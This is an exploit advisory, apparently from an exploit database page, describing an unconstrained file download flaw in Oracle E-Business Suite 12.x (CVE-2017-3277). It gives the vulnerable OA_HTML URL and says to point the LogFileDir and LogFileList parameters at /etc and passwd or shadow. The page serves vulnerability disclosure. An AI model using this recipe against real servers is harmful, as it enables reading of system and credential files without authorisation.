Oracle E-Business Suite 12.x Unconstrainted File Download

2017.01.23

Credit: Owais Mehtab, Tayeeb Rana

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: [Unconstrained File Download - Oracle E-Business Suite]
# Exploit Discoverer: [Owais Mehtab, Tayeeb Rana]
# Vendor Homepage: [http://www.oracle.com]
# Version: [12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6]
# CVE: 2017-3277
[Attack Vectors]
exploitation may be done by sending a post request to following url
http://example.com/OA_HTML/weboam/oam/patch/timing/ViewLogFiles$programRunId=8548$sessionId=231730$page*_session*_id=231730$utilityFlag=Completed$startDate=1472726192000$taskName=AutoPatch_20-_20u21444745.drv$lastUpdate=1472726297000$status=Completed$taskid=231730$taskId=231730$totalRunTime=1_20min,_2045_20sec$utilityName=adpatch$target=FINchange
Change the following in post request:-
1-The LogFileDir parameter to any system directory (e.g., /etc)
2-The LogFileList:key:1 parameter value to the file name that needs to be downloaded (passwd or shadow)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Oracle E-Business Suite 12.x Unconstrainted File Download

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.